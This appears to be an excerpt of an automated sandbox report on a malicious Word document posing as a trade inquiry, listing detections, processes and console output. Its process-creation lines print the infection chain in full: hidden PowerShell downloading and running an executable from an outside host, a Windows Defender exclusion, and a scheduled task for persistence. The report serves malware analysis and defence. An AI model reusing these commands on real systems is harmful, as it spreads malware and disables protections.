          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.sln
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drOLE document summary: edited time not present or 0
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.docReversingLabs: Detection: 32%
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.docVirustotal: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................j.....p.........j.......e.....`Ig.......bw.....................Kn.....................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Rfk....X.t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t...".....t.....0.................Y.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Rfk......t.............................}.dw....H.t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....X.t.....0.................Y.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Rfk......t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Qfk....."Y.............................}.dw....X.t.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Rfk......t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Qfk....."Y.............................}.dw....H.t.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Rfk......t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Qfk....."Y.............................}.dw....@.t.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Rfk......t.............................}.dw....x.t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Qfk....."Y.............................}.dw......t.....0.......................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Rfk....h.t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... ........Qfk....."Y.............................}.dw....x.t.....0.................Y.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Rfk....0.t.............................}.dw......t.....0...............X.Y.............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............,.......p........^......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............,.......p........_......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............,.......p.......<_......................0......./.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............,.......p.......X_......................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............,.......p........_......................0.......;...............|.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............,.......p........_......................0.......;.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........_......................0.......G...............".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............,.......p........_......................0.......G.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............,.......l........`......................0.......S.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............,.......l.......&`......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......u.y...e.x.e.............,.......l.......P`......................0......._.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............,.......l.......l`......................0......._.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............,.......p........`......................0.......k.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............,.......p........`......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............,.......l........a......................0.......w.......................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............,.......p.......:a......................0.......................l.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............,.......p.......Wa......................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............,.......p........a......................0...............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............,.......l........a......................0...............................h...............
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....................h......./_................................................................).....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........=.......r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............M.Xk....p|..............................}.dw.....|......0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...(.......0.A.............."d.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............M.Xk....................................}.dw....`.......0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....p.......0.A.............."d.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............M.Xk....(...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................Xk....@&d.............................}.dw....p.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............M.Xk....(...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................Xk....@&d.............................}.dw....`.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................Xk....@&d.............................}.dw....X.......0.A.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................Xk....@&d.............................}.dw............0.A.....................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............M.Xk....................................}.dw............0.A..............#d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .........Xk....@&d.............................}.dw............0.A.............."d.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............M.Xk....H...............................}.dw............0.A..............#d.............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................+v......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................Uv......................0.......#.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................v......................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................v......................0......./.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................l........v......................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................l........v......................0.......;.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G.......h.......".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................l.......0w......................0.......G.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................l.......[w......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................l........w......................0.......S.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......u.y...e.x.e.....................l........w......................0......._.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................x........w......................0......._.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x........x......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x....... x......................0.......k.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................l.......tx......................0.......w.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........x......................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........x......................0...............h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................l........x......................0...............h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........y......................0...............h...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................l.).........E.R.R.O.R.:. ...h.......P...............gs................................................................).....
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................l.).........E.R.R.O.(.P.....h.......P...............ms..............................................j.......H.........).....
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............x...............................0.......#.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............x...............................0......./......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............x...............................0......./.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l...............x.......4.......................0.......;...............|......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l.......................Q.......................0.......;.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......y.......................0.......G.......H......."......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....l...............................................0.......G.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............x...............................0.......S......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............x...............................0.......S.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......u.y...e.x.e.....l...............x...............................0......._.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....l...............x...............................0......._.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l.......................F.......................0.......k......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l.......................a.......................0.......k.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.......2......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....l...............................................0.......w.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............................................0.......................l......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............................................0...............H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....l...............x...............................0...............H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............x.......0.......................0...............H................. .............
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...P...............|................................................. .............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....P...............|.......................................................j.......X...............
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\AppData\Roaming\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR52EF.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
